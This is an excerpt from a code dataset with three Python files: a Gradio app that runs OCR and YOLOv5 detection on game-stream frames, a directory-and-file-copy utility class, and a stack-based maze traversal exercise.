skimage import io\nimport numpy as np\nimport craft_utils\n# import test\nimport imgproc\nimport file_utils\nimport json\nimport zipfile\nimport pandas as pd\nimport CRAFTpytorch.test as test\n# import test\n\nfrom CRAFTpytorch.test import copyStateDict\n# from test import copyStateDict\nfrom craft import CRAFT\n\nfrom collections import OrderedDict\n\nfrom pathlib import Path\nfrom numpy import random\nsys.path.append('./yolov5/')\nfrom models.experimental import attempt_load\nfrom utils.datasets import LoadStreams, LoadImages\nfrom utils.general import check_img_size, check_requirements, check_imshow, non_max_suppression, apply_classifier, \\\n    scale_coords, xyxy2xywh, strip_optimizer, set_logging, increment_path\nfrom utils.plots import plot_one_box\nfrom utils.torch_utils import select_device, load_classifier, time_synchronized\n# DETECTION 
_____________________________________________________\ndef load_detection_model():\n parser = argparse.ArgumentParser(description='CRAFT Text Detection')\n parser.add_argument('--trained_model', default='weights/craft_mlt_25k.pth', type=str, help='pretrained model')\n parser.add_argument('--text_threshold', default=0.7, type=float, help='text confidence threshold')\n parser.add_argument('--low_text', default=0.4, type=float, help='text low-bound score')\n parser.add_argument('--link_threshold', default=0.4, type=float, help='link confidence threshold')\n parser.add_argument('--cuda', default=True, type=str2bool, help='Use cuda for inference')\n parser.add_argument('--canvas_size', default=1280, type=int, help='image size for inference')\n parser.add_argument('--mag_ratio', default=1.5, type=float, help='image magnification ratio')\n parser.add_argument('--poly', default=False, action='store_true', help='enable polygon type')\n parser.add_argument('--show_time', default=False, action='store_true', help='show processing time')\n parser.add_argument('--test_folder', default='/data/', type=str, help='folder path to input images')\n parser.add_argument('--refine', default=False, action='store_true', help='enable link refiner')\n parser.add_argument('--refiner_model', default='weights/craft_refiner_CTW1500.pth', type=str, help='pretrained refiner model')\n # args = parser.parse_args([\"--trained_model=/content/CRAFTpytorch/basenet/craft_mlt_25k.pth\",\"--test_folder=\"+impath,\"--refine\", \"--refiner_model=/content/CRAFTpytorch/basenet/craft_refiner_CTW1500.pth\"])\n args = parser.parse_args([\"--trained_model=./CRAFTpytorch/basenet/craft_mlt_25k.pth\",\"--refine\", \"--refiner_model=./CRAFTpytorch/basenet/craft_refiner_CTW1500.pth\"])\n net = CRAFT() # initialize\n print('Loading weights from checkpoint (' + args.trained_model + ')')\n if args.cuda:\n net.load_state_dict(copyStateDict(torch.load(args.trained_model)))\n else:\n net.load_state_dict(copyStateDict(torch.load(args.trained_model, map_location='cpu')))\n\n if args.cuda:\n net = net.cuda()\n net = torch.nn.DataParallel(net)\n cudnn.benchmark = False\n\n net.eval()\n\n # LinkRefiner\n refine_net = None\n if args.refine:\n from refinenet import RefineNet\n refine_net = RefineNet()\n print('Loading weights of refiner from checkpoint (' + args.refiner_model + ')')\n if args.cuda:\n refine_net.load_state_dict(copyStateDict(torch.load(args.refiner_model)))\n refine_net = refine_net.cuda()\n refine_net = torch.nn.DataParallel(refine_net)\n else:\n refine_net.load_state_dict(copyStateDict(torch.load(args.refiner_model, map_location='cpu')))\n\n refine_net.eval()\n # args.poly = True\n return net,refine_net,args\n\n\ndef str2bool(v):\n return v.lower() in (\"yes\", \"y\", \"true\", \"t\", \"1\")\ndef infer_detection(image,image_name,net,refine_net,args):\n #CRAFT\n data={}\n t = time.time()\n\n # load data\n # image = imgproc.loadImage(image_path)\n # image_name=int(os.path.relpath(image_path, start).replace('.jpg',''))\n bboxes, polys, score_text, det_scores = test.test_net(net, image, args.text_threshold, args.link_threshold, args.low_text, args.cuda, args.poly, args, refine_net)\n bbox_score={}\n index=0\n for box,conf in zip(bboxes,det_scores):\n bbox_score[str(index)]={}\n bbox_score[str(index)]['detconf']=str(conf)\n bbox_score[str(index)]['box']=[]\n for coors in box:\n temp=[str(coors[0]),str(coors[1])]\n bbox_score[str(index)]['box'].append(temp)\n index+=1\n data[image_name]=bbox_score\n if not os.path.isdir('./Results'):\n 
os.mkdir('./Results')\n    # data.to_csv('./Results_csv/data.csv', sep = ',', na_rep='Unknown')\n    # print(data)\n    with open('./Results/data.json', 'w') as jsonfile:\n        json.dump(data, jsonfile,sort_keys=True)\n        jsonfile.close()\n    print(\"elapsed time : {}s\".format(time.time() - t))\n\n\n# RECOGNITION__________________________\n# from google.colab.patches import cv2_imshow  # Colab-only helper; unused here and breaks outside notebooks\nimport matplotlib.pyplot as plt\nfrom PIL import Image\n\nfrom vietocr.tool.predictor import Predictor\nfrom vietocr.tool.config import Cfg\ndef load_recognition_model():\n    # prepare the OCR prediction model\n    config = Cfg.load_config_from_name('vgg_seq2seq')\n    config['cnn']['pretrained']=False\n    config['device'] = 'cuda:0'\n    config['predictor']['beamsearch']=False\n    recognizer = Predictor(config)\n    return recognizer\n\nimport shutil\ndef crop(pts, image):\n\n    \"\"\"\n    Takes inputs as 8 points\n    and Returns cropped, masked image with a white background\n    \"\"\"\n    for i in pts:\n        if (i[0]<0):\n            i[0]=0\n        if(i[1]<0):\n            i[1]=0\n    rect = cv2.boundingRect(pts)\n    x,y,w,h = rect\n    #print('x,y,w,h:',x,y,w,h)\n    #print(image)\n    cropped = image[y:y+h, x:x+w].copy()\n    pts = pts - pts.min(axis=0)\n    mask = np.zeros(cropped.shape[:2], np.uint8)\n    cv2.drawContours(mask, [pts], -1, (255, 255, 255), -1, cv2.LINE_AA)\n    dst = cv2.bitwise_and(cropped, cropped, mask=mask)\n    bg = np.ones_like(cropped, np.uint8)*255\n    cv2.bitwise_not(bg,bg, mask=mask)\n    dst2 = bg + dst\n\n    return dst2\ndef generate_words(image_name, score_bbox, image,recognizer,tsvdata):\n\n    #score_bbox: {'0': {'detconf': '0.886273', 'box': [['604.8', '116.8'], ['737.6', '116.8'], ['737.6', '209.6'],...\n    num_bboxes = len(score_bbox)\n\n    for num in range(num_bboxes): # iterate over every bbox in one image\n        bbox_coords = score_bbox[str(num)]['box']\n        if(bbox_coords):\n            l_t = float(bbox_coords[0][0])\n            t_l = float(bbox_coords[0][1])\n            r_t = float(bbox_coords[1][0])\n            t_r = float(bbox_coords[1][1])\n            r_b = float(bbox_coords[2][0])\n            b_r = float(bbox_coords[2][1])\n            l_b = float(bbox_coords[3][0])\n            b_l = float(bbox_coords[3][1])\n            pts = np.array([[int(l_t), int(t_l)], [int(r_t) ,int(t_r)], [int(r_b) , int(b_r)], [int(l_b), int(b_l)]])\n            #print('pts:',pts)\n            if np.all(pts > 0):  # all corner coordinates must be positive\n                # break\n                word = crop(pts, image)\n                img=Image.fromarray(word)\n                trans=recognizer.predict(img)\n                # print(str(num),':',trans, type(trans))\n                coords=tsvdata[image_name][str(num)]['box']\n                coords=[\"1\",coords[0][0],coords[0][1],coords[1][0],coords[1][1],coords[2][0],coords[2][1],coords[3][0],coords[3][1]]\n                tsvdata[image_name][str(num)]['trans']=trans\n                # folder = '/'.join( image_name.split('/')[:-1])\n                # folder=image_name\n\n\n                # #CHANGE DIR\n                # if not os.path.isdir('./cropped_words'):\n                #   os.mkdir('./cropped_words')\n                # dir = './cropped_words/'\n\n                # if not os.path.isdir(os.path.join(dir + folder)):\n                #   os.mkdir(os.path.join(dir + folder))\n                # dir=dir+folder+'/'\n\n                # try:\n                #   # print(image_name)\n                #   file_name = os.path.join(dir + image_name+'_'+str(num))\n                #   # cv2.imwrite(file_name+'_{}_{}_{}_{}_{}_{}_{}_{}.jpg'.format(l_t, t_l, r_t ,t_r, r_b , b_r ,l_b, b_l), word)\n                #   cv2.imwrite(file_name+'.jpg',word)\n                #   #print('Image saved to '+file_name+'_{}_{}_{}_{}_{}_{}_{}_{}.jpg'.format(l_t, t_l, r_t ,t_r, r_b , b_r ,l_b, b_l))\n                # except:\n                #   continue\n\n\ndef crop_OCR(recognizer, image,image_name):\n    data=json.load(open('./Results/data.json')) # path to detection results (JSON)\n    # print(data)\n\n    # start = './frames' #PATH TO TEST IMAGES\n\n    # for image_name in data:\n    #print(str(os.path.join(start, data['image_name'][image_num])))\n    # image = 
cv2.imread(os.path.join(start,image_name+'.jpg'))\n score_bbox = data[image_name]\n generate_words(image_name, score_bbox, image,recognizer,data)\n with open('./Results/data.json', 'w') as jsonfile:\n json.dump(data, jsonfile)\n jsonfile.close()\n # shutil.rmtree(start)\n\n\n# yolo_________________________\ndef load_yolo():\n parser = argparse.ArgumentParser()\n parser.add_argument('--weights', nargs='+', type=str, default='yolov5s.pt', help='model.pt path(s)')\n parser.add_argument('--source', type=str, default='data/images', help='source') # file/folder, 0 for webcam\n parser.add_argument('--img-size', type=int, default=640, help='inference size (pixels)')\n parser.add_argument('--conf-thres', type=float, default=0.25, help='object confidence threshold')\n parser.add_argument('--iou-thres', type=float, default=0.45, help='IOU threshold for NMS')\n parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu')\n parser.add_argument('--view-img', action='store_true', help='display results')\n parser.add_argument('--save-txt', action='store_true', help='save results to *.txt')\n parser.add_argument('--save-conf', action='store_true', help='save confidences in --save-txt labels')\n parser.add_argument('--nosave', action='store_true', help='do not save images/videos')\n parser.add_argument('--classes', nargs='+', type=int, help='filter by class: --class 0, or --class 0 2 3')\n parser.add_argument('--agnostic-nms', action='store_true', help='class-agnostic NMS')\n parser.add_argument('--augment', action='store_true', help='augmented inference')\n parser.add_argument('--update', action='store_true', help='update all models')\n parser.add_argument('--project', default='runs/detect', help='save results to project/name')\n parser.add_argument('--name', default='exp', help='save results to project/name')\n parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment')\n # opt = parser.parse_args()\n opt = parser.parse_args([\"--weights=./yolov5/runs/train/best.pt\",\"--img=320\", \"--conf=0.5\",\"--save-txt\",\"--exist-ok\"])\n check_requirements(exclude=('pycocotools', 'thop'))\n print(opt)\n check_requirements(exclude=('pycocotools', 'thop'))\n weights, view_img, save_txt, imgsz = opt.weights, opt.view_img, opt.save_txt, opt.img_size\n\n # Initialize\n set_logging()\n device = select_device(opt.device)\n half = device.type != 'cpu' # half precision only supported on CUDA\n\n # Load model\n model = attempt_load(weights, map_location=device) # load FP32 model\n stride = int(model.stride.max()) # model stride\n imgsz = check_img_size(imgsz, s=stride) # check img_size\n if half:\n model.half() # to FP16\n if device.type != 'cpu':\n model(torch.zeros(1, 3, imgsz, imgsz).to(device).type_as(next(model.parameters()))) # run once\n return opt,model,stride\n\n\ndef detect(opt,model,stride,save_img=False):\n source, weights, view_img, save_txt, imgsz = opt.source, opt.weights, opt.view_img, opt.save_txt, opt.img_size\n save_img = not opt.nosave and not source.endswith('.txt') # save inference images\n webcam = source.isnumeric() or source.endswith('.txt') or source.lower().startswith(\n ('rtsp://', 'rtmp://', 'http://', 'https://'))\n\n # Directories\n save_dir = Path(increment_path(Path(opt.project) / opt.name, exist_ok=opt.exist_ok)) # increment run\n (save_dir / 'labels' if save_txt else save_dir).mkdir(parents=True, exist_ok=True) # make dir\n\n # Initialize\n device = select_device(opt.device)\n half = device.type != 'cpu' # half 
precision only supported on CUDA\n # Set Dataloader\n vid_path, vid_writer = None, None\n dataset = LoadImages(source, img_size=imgsz, stride=stride)\n\n # Get names and colors\n names = model.module.names if hasattr(model, 'module') else model.names\n colors = [[random.randint(0, 255) for _ in range(3)] for _ in names]\n\n # Run inference\n t0 = time.time()\n for path, img, im0s, vid_cap in dataset:\n img = torch.from_numpy(img).to(device)\n img = img.half() if half else img.float() # uint8 to fp16/32\n img /= 255.0 # 0 - 255 to 0.0 - 1.0\n if img.ndimension() == 3:\n img = img.unsqueeze(0)\n\n # Inference\n t1 = time_synchronized()\n pred = model(img, augment=opt.augment)[0]\n\n # Apply NMS\n pred = non_max_suppression(pred, opt.conf_thres, opt.iou_thres, classes=opt.classes, agnostic=opt.agnostic_nms)\n t2 = time_synchronized()\n\n # Apply Classifier\n # if classify:\n # pred = apply_classifier(pred, modelc, img, im0s)\n\n # Process detections\n for i, det in enumerate(pred): # detections per image\n p, s, im0, frame = path, '', im0s, getattr(dataset, 'frame', 0)\n\n p = Path(p) # to Path\n save_path = str(save_dir / p.name) # img.jpg\n txt_path = str(save_dir / 'labels' / p.stem) + ('' if dataset.mode == 'image' else f'_{frame}') # img.txt\n s += '%gx%g ' % img.shape[2:] # print string\n gn = torch.tensor(im0.shape)[[1, 0, 1, 0]] # normalization gain whwh\n if len(det):\n # Rescale boxes from img_size to im0 size\n det[:, :4] = scale_coords(img.shape[2:], det[:, :4], im0.shape).round()\n\n # Print results\n for c in det[:, -1].unique():\n n = (det[:, -1] == c).sum() # detections per class\n s += f\"{n} {names[int(c)]}{'s' * (n > 1)}, \" # add to string\n\n # Write results\n for *xyxy, conf, cls in reversed(det):\n if save_txt: # Write to file\n xywh = (xyxy2xywh(torch.tensor(xyxy).view(1, 4)) / gn).view(-1).tolist() # normalized xywh\n line = (cls, int(xyxy[0]), int(xyxy[1]), int(xyxy[2]), int(xyxy[3]), conf) if opt.save_conf else (cls, int(xyxy[0]), int(xyxy[1]), int(xyxy[2]), int(xyxy[3])) # label format\n # print(line)\n with open(txt_path + '.txt', 'a') as f:\n f.write(('%g ' * len(line)).rstrip() % line + '\\n')\n\n if save_img or view_img: # Add bbox to image\n label = f'{names[int(cls)]} {conf:.2f}'\n plot_one_box(xyxy, im0, label=label, color=colors[int(cls)], line_thickness=3)\n\n # Print time (inference + NMS)\n # print(f'{s}Done. ({t2 - t1:.3f}s)')\n\n # Stream results\n if view_img:\n cv2.imshow(str(p), im0)\n cv2.waitKey(1) # 1 millisecond\n\n # Save results (image with detections)\n if save_img:\n if dataset.mode == 'image':\n cv2.imwrite(save_path, im0)\n else: # 'video' or 'stream'\n if vid_path != save_path: # new video\n vid_path = save_path\n if isinstance(vid_writer, cv2.VideoWriter):\n vid_writer.release() # release previous video writer\n if vid_cap: # video\n fps = vid_cap.get(cv2.CAP_PROP_FPS)\n w = int(vid_cap.get(cv2.CAP_PROP_FRAME_WIDTH))\n h = int(vid_cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\n else: # stream\n fps, w, h = 30, im0.shape[1], im0.shape[0]\n save_path += '.mp4'\n vid_writer = cv2.VideoWriter(save_path, cv2.VideoWriter_fourcc(*'mp4v'), fps, (w, h))\n vid_writer.write(im0)\n\n if save_txt or save_img:\n s = f\"\\n{len(list(save_dir.glob('labels/*.txt')))} labels saved to {save_dir / 'labels'}\" if save_txt else ''\n # print(f\"Results saved to {save_dir}{s}\")\n\n # print(f'Done. 
({time.time() - t0:.3f}s)')\ndef get_iou(pred_box, gt_box):\n \"\"\"\n pred_box : the coordinate for predict bounding box\n gt_box : the coordinate for ground truth bounding box\n return : the iou score\n the left-down coordinate of pred_box:(pred_box[0], pred_box[1])\n the right-up coordinate of pred_box:(pred_box[2], pred_box[3])\n \"\"\"\n # 1.get the coordinate of inters\n ixmin = max(pred_box[0], gt_box[0])\n ixmax = min(pred_box[2], gt_box[2])\n iymin = max(pred_box[1], gt_box[1])\n iymax = min(pred_box[3], gt_box[3])\n\n iw = np.maximum(ixmax-ixmin+1., 0.)\n ih = np.maximum(iymax-iymin+1., 0.)\n\n # 2. calculate the area of inters\n inters = iw*ih\n\n # 3. calculate the area of union\n uni = ((pred_box[2]-pred_box[0]+1.) * (pred_box[3]-pred_box[1]+1.) +\n (gt_box[2] - gt_box[0] + 1.) * (gt_box[3] - gt_box[1] + 1.) -\n inters)\n\n # 4. calculate the overlaps between pred_box and gt_box\n iou = inters / uni\n\n return iou\n#Visualize____________________\ndef visualize_pred(imgtest,image_name):\n if os.path.exists(\"./Results/data.json\"):\n data=json.load(open('./Results/data.json'))\n for k,v in data[image_name].items():\n bbox= v['box']\n bbox = np.array([[int(float(i)) for i in coord] for coord in bbox])\n # print(k)\n try:\n label= v['trans']\n except:\n label=' '\n bbox_= bbox.reshape((-1,1,2))\n cv2.polylines(imgtest,[bbox_],True,(0,0,255))\n imgtest=Image.fromarray(imgtest)\n draw = ImageDraw.Draw(imgtest)\n draw.text((bbox[0][0],bbox[0][1]),label, font = font,fill=(0,0,255,255))\n imgtest = np.array(imgtest)\n #visualize output frame: YOLO\n if os.path.exists(\"./runs/detect/exp/labels/temp.txt\"):\n data=open(\"./runs/detect/exp/labels/temp.txt\",'r')\n\n boxes=[]\n for i in data:\n x=i.rstrip().split(' ')[1:5]\n boxes.append([int(x[0])+1625, int(x[1])+785, int(x[2])+1625, int(x[3])+785])\n res = np.zeros(len(boxes),dtype=int)\n color=0\n final={}\n for i in range (len(boxes)-1):\n if(res[i]==0):\n color+=1\n res[i]=color\n final[str(res[i])]=[boxes[i]]\n for j in range (i+1,len(boxes)):\n iou=get_iou(boxes[i],boxes[j])\n if (iou>=0.1 and res[i]!=res[j]):\n res[j]=res[i]\n final[str(res[i])].append(boxes[j])\n if (str(res[-1]) in final):\n final[str(res[-1])].append(boxes[-1])\n else:\n final[str(res[-1])]=[boxes[-1]]\n for k,v in final.items():\n if(len(v)>1):\n pts=[]\n v=np.array(v)\n # c1=(int(np.mean(v[:,0])),int(np.mean(v[:,1])))\n # c2=(int(np.mean(v[:,2])),int(np.mean(v[:,3])))\n x_cen=int((int(np.mean(v[:,0]))+int(np.mean(v[:,2])))/2)\n y_cen=int((int(np.mean(v[:,1]))+int(np.mean(v[:,3])))/2)\n # cv2.rectangle(imgtest, c1, c2, (0,0,255), thickness=2, lineType=cv2.LINE_AA)\n cv2.putText(imgtest, '!!!', (x_cen,y_cen), cv2.FONT_HERSHEY_SIMPLEX,1, (0,0,255), 2, cv2.LINE_AA)\n for x in boxes:\n c1, c2 = (x[0], x[1]), (x[2], x[3])\n cv2.rectangle(imgtest, c1, c2, (0,255,255), thickness=1, lineType=cv2.LINE_AA)\n return imgtest\n#MAIN_________________________________\n\ncraft_net,craft_refine_net,craft_args=load_detection_model()\nrecognizer=load_recognition_model()\nopt,model,stride=load_yolo()\nfontpath = \"./arial.ttf\" # <== download font\nfont = ImageFont.truetype(fontpath, 20)\ndef sepia(Infer_from_Video,InputVideo,Infer_from_Image,InputImage):\n videoFile=InputVideo\n ImageFile=InputImage\n outputImage=InputImage\n if os.path.exists(\"./output.mp4\"):\n os.remove(\"./output.mp4\")\n \n # videoFile=input(\"Input video_path (type 'ESC' to exit!) 
:\")\n\n    #get 1 frame per second\n    # videoFile = \"/content/LoLstream_test2.mp4\"\n    # imagesFolder = \"./frames\"\n    # if not os.path.isdir(imagesFolder):\n    #     os.mkdir(imagesFolder)\n    if (Infer_from_Video == False):\n        shutil.copy(InputVideo,\"./output.mp4\")\n        outputVideo=\"./output.mp4\"\n    else:\n        cap = cv2.VideoCapture(videoFile)\n        frameRate = cap.get(5) #frame rate\n        width = int(cap.get(3)) # float `width`\n        height = int(cap.get(4))\n        size=(width, height)\n        image_name=\"0\"\n        fps=20\n        # cv2.VideoWriter_fourcc(*'MP4V')\n        writer = cv2.VideoWriter('output.mp4',cv2.VideoWriter_fourcc(*'mp4v'), 20, size)\n        # writer = cv2.VideoWriter('output.avi',cv2.VideoWriter_fourcc(*'XVID'), 20, size)\n        while(cap.isOpened()):\n            frameId = cap.get(1) #current frame number\n            ret, frame = cap.read()\n            if (ret != True):\n                break\n            \n            if (frameId % math.floor(frameRate) == 0):\n                # imgtest = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n                imgtest=frame\n                # imgtest=Image.fromarray(frame)\n                # imgtest = imgtest[:,:,::-1]\n                # imgtest.save(\"./temp1.jpg\")\n                image_name=str(int(frameId))\n                print('frame id: ',image_name)\n                # if not os.path.isdir('./temp'):\n                #   os.mkdir('./temp')\n                # cv2.imwrite(\"./temp/\"+image_name+\".jpg\", imgtest)\n\n                infer_detection(imgtest,image_name,craft_net,craft_refine_net,craft_args)\n                crop_OCR(recognizer, imgtest,image_name)\n\n                # minimap=imgtest.crop((1625, 785, 1920, 1080))\n                minimap = imgtest[785:1080, 1625:1920]\n                cv2.imwrite(\"./temp.jpg\", minimap)\n                # minimap.save(\"./temp.jpg\")\n                opt.source=\"./temp.jpg\"\n                detect(opt,model,stride,save_img=False)\n                fps=20\n            #visualize output frame: OCR\n            if (fps>0):\n                imgtest=visualize_pred(frame,image_name)\n            writer.write(imgtest)\n            fps-=1\n        if os.path.exists(\"./temp.jpg\"):\n            os.remove(\"./temp.jpg\")\n        if os.path.exists(\"./runs\"):\n            shutil.rmtree(\"./runs\")\n        cap.release()\n        writer.release()\n        outputVideo=\"./output.mp4\"\n\n    if (Infer_from_Image == True):\n        imgtest=ImageFile\n        # imgtest = cv2.cvtColor(imgtest, cv2.COLOR_BGR2RGB)\n        image_name=\"img_infer\"\n        infer_detection(imgtest,image_name,craft_net,craft_refine_net,craft_args)\n        crop_OCR(recognizer, imgtest,image_name)\n\n        # minimap=imgtest.crop((1625, 785, 1920, 1080))\n        minimap = imgtest[785:1080, 1625:1920]\n        cv2.imwrite(\"./temp.jpg\", minimap)\n        # minimap.save(\"./temp.jpg\")\n        opt.source=\"./temp.jpg\"\n        detect(opt,model,stride,save_img=False)\n        imgtest=visualize_pred(imgtest,image_name)\n        cv2.imwrite(\"./img_pred.jpg\", imgtest)\n        outputImage=imgtest\n        if os.path.exists(\"./temp.jpg\"):\n            os.remove(\"./temp.jpg\")\n        if os.path.exists(\"./runs\"):\n            shutil.rmtree(\"./runs\")\n    print(\"Done!\")\n    print(\"OUTPUT:------------\",outputVideo,outputImage.shape)\n    return [outputVideo, outputImage]\ninputt=[gr.inputs.Checkbox(label=\"Infer_from_Video\"),gr.inputs.Video(label=\"InputVideo\"),gr.inputs.Checkbox(label=\"Infer_from_Image\"),gr.inputs.Image(label=\"InputImage\")]\nsamples=[[\"LoLstream_test6.mp4\",\"img.png\"]]\ndes=\"*Instructions:\\n \\t* Tick the matching Infer_from_Video/Image checkbox to run inference.\\n \\t* Note: InputVideo and InputImage must both be provided even when their checkbox is not ticked \\n \\t * InputVideo and InputImage must have a resolution of 1920x1080\"\niface = gr.Interface(fn=sepia,inputs=inputt,outputs=[gr.outputs.Video(label=\"OutputVideo\"),gr.outputs.Image(label=\"OutputImage\")],verbose=True,interpretation=\"default\",description=des)\n
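# Hypothetical smoke test (file names are placeholders, not shipped assets):\n# the handler can also be called directly, bypassing the Gradio UI, e.g.\n#   out_video, out_image = sepia(True, \"my_1080p_stream.mp4\", False, cv2.imread(\"my_1080p_frame.png\"))\n#   print(out_video, out_image.shape)\n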
# iface = gr.Interface(fn=sepia,inputs=gr.inputs.Video(label=\"Input Video\"),outputs=gr.outputs.Video(label=\"Output Video\"),examples=samples,interpretation=\"default\")\n# iface = gr.Interface(fn=sepia,inputs=gr.inputs.Image(),outputs=\"text\")\niface.launch(debug=True,share=True)\n# input(\"Running....\")\n","sub_path":"inferenceUI.py","file_name":"inferenceUI.py","file_ext":"py","file_size_in_byte":23835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"646633383","text":"# !/usr/bin/python\n\n\"\"\"\n-----------------------------------------------\nOvid's Creation of Data..\n\nWritten By: Colton Fetters\nVersion: 1.3\nFirst release: 12/2017\n\n-----------------------------------------------\nDEVELOPER NOTES: Small Notes\n\n    Version History:\n        v1.3: added transcribe capabilities\n        v1.2: documentation standardization\n        v1.1: added ability to copy content of a directory\n        v1.0: initial release\n\"\"\"\n\n# Import module\nimport os\nimport shutil\n\n# Import package\nimport transcribe\n\n\nclass Core(object):\n    \"\"\"\n    Writing out directories\n    \"\"\"\n    transcripts = transcribe.Core(loggingName='author', level='info')\n    LOGGER = transcripts.logger\n\n    def __init__(self, directory=None):\n        self._TITLE = os.path.splitext(os.path.basename(__file__))[0]\n        self._DIRECTORY = directory\n        self._VERSION = 1.3\n        self.LOGGER.debug('Object Version {number} has Been Created'.format(number=self._VERSION))\n\n    def set_directory(self, directoryPath=None):\n        \"\"\"[Creates Folder Directory]\n\n        [Creates a folder directory based on the file path given to the class]\n\n        Parameters\n        ----------\n        directoryPath : {[String]}\n            [Directory passed through Method]\n\n        Returns\n        -------\n        [str]\n            [Absolute path of the directory, or None if no directory was supplied]\n        \"\"\"\n        if directoryPath:\n            path = os.path.abspath(directoryPath)\n\n        elif self._DIRECTORY:\n            path = os.path.abspath(self._DIRECTORY)\n\n        else:\n            self.LOGGER.warning('No Directory Supplied')\n            return None\n\n        folderStatus = os.path.exists(os.path.normpath(os.path.abspath(path)))\n\n        if not folderStatus:\n            try:\n                os.mkdir(os.path.normpath(os.path.abspath(path)))\n                self.LOGGER.debug('Directory Created {path}'.format(path=os.path.abspath(path)))\n\n            except WindowsError:\n                self.LOGGER.warning('Could Not Create {path}'.format(path=os.path.abspath(path)))\n\n            except OSError:\n                self.LOGGER.warning('Could Not Create {path}'.format(path=os.path.abspath(path)))\n\n            finally:\n                if not (os.path.exists(os.path.normpath(os.path.abspath(path)))):\n                    os.makedirs((os.path.normpath(os.path.abspath(path))))\n                    self.LOGGER.info('Directory Created Multiple Folders in {path}'.format(path=os.path.abspath(path)))\n\n        return os.path.abspath(path)\n\n    def file_copy(self, sourcePath, destinationPath):\n        \"\"\"[Copy the Contents of One Directory into Another]\n\n        [Transfers individual files from one directory to the next]\n\n        Parameters\n        ----------\n        sourcePath : {[String]}\n            [Directory Path]\n\n        destinationPath : {[String]}\n            [Directory Path]\n        \"\"\"\n        for item in os.listdir(os.path.abspath(sourcePath)):\n\n            sourceFile = os.path.join(sourcePath, item)\n\n            destinationFile = os.path.join(destinationPath, item)\n\n            if os.path.isfile(os.path.abspath(sourceFile)):\n\n                shutil.copy2(os.path.abspath(sourceFile), os.path.abspath(destinationFile))\n\n                self.LOGGER.debug('Copied {source} to {destination}'.format(source=os.path.abspath(sourceFile),\n                                                                            destination=os.path.abspath(destinationFile)))\n\n\ndef main():\n    objectCore = Core()\n    objectCore.LOGGER.info('Successful Import!')\n    return objectCore\n\n\nif __name__ == '__main__':\n    
main()\n","sub_path":"author.py","file_name":"author.py","file_ext":"py","file_size_in_byte":3605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"110180822","text":"from room import Room\nfrom player import Player\nfrom world import World\nfrom util import Stack\n\n\nimport random\nfrom ast import literal_eval\n\n# Load world\nworld = World()\n\n\n# You may uncomment the smaller graphs for development and testing purposes.\n# map_file = \"maps/test_line.txt\"\n# map_file = \"maps/test_cross.txt\"\n# map_file = \"maps/test_loop.txt\"\n# map_file = \"maps/test_loop_fork.txt\"\nmap_file = \"maps/main_maze.txt\"\n\n# Loads the map into a dictionary\nroom_graph = literal_eval(open(map_file, \"r\").read())\nworld.load_graph(room_graph)\n\n# Print an ASCII map\nworld.print_rooms()\n\nplayer = Player(world.starting_room)\n\n# Fill this out with directions to walk\n# traversal_path = ['n', 'n']\ntraversal_path = []\n\n\ndef populate_seen(g, current_room):\n exits = current_room.get_exits()\n g[current_room.id] = {}\n\n for exit in exits:\n g[current_room.id][exit] = '?'\n # print(g)\n\n\ndef get_opposites(direction):\n # save our route back to unvisited exits\n if direction == 'n':\n return 's'\n elif direction == 's':\n return 'n'\n elif direction == 'e':\n return 'w'\n elif direction == 'w':\n return 'e'\n\n\ns = Stack()\nvisited = set()\n\nseen = dict()\n# populate seen dict with initial room\npopulate_seen(seen, player.current_room)\n\n# while loop will terminate when each room has been added to visited set\nwhile len(visited) < len(world.rooms):\n exits = player.current_room.get_exits()\n\n path = []\n for direction in exits:\n # check if exits in visited, add to path\n if player.current_room.get_room_in_direction(direction) not in visited and direction is not None:\n path.append(direction)\n\n # add to visited and populate seen dict\n visited.add(player.current_room)\n populate_seen(seen, player.current_room)\n\n # if there are directions in the path, pick one and travel\n if len(path) > 0:\n # pick random direction\n nxt = random.randint(0, len(path) - 1)\n # add to traversal path and stack\n traversal_path.append(path[nxt])\n s.push(path[nxt])\n # move player\n player.travel(path[nxt])\n else: # travel backward\n last = s.pop()\n player.travel(get_opposites(last))\n traversal_path.append(get_opposites(last))\n\n# print(seen)\n\nprint('===================')\nprint(traversal_path)\nprint('===================')\n\n\n# TRAVERSAL TEST\nvisited_rooms = set()\nplayer.current_room = world.starting_room\nvisited_rooms.add(player.current_room)\n\nfor move in traversal_path:\n player.travel(move)\n visited_rooms.add(player.current_room)\n\nif len(visited_rooms) == len(room_graph):\n print(\n f\"TESTS PASSED: {len(traversal_path)} moves, {len(visited_rooms)} rooms visited\")\nelse:\n print(\"TESTS FAILED: INCOMPLETE TRAVERSAL\")\n print(f\"{len(room_graph) - len(visited_rooms)} unvisited rooms\")\n\n\n#######\n# UNCOMMENT TO WALK AROUND\n#######\n# player.current_room.print_room_description(player)\n# while True:\n# cmds = input(\"-> \").lower().split(\" \")\n# if cmds[0] in [\"n\", \"s\", \"e\", \"w\"]:\n# player.travel(cmds[0], True)\n# elif cmds[0] == \"q\":\n# break\n# else:\n# print(\"I did not understand that command.\")\n","sub_path":"projects/adventure/adv.py","file_name":"adv.py","file_ext":"py","file_size_in_byte":3197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} 
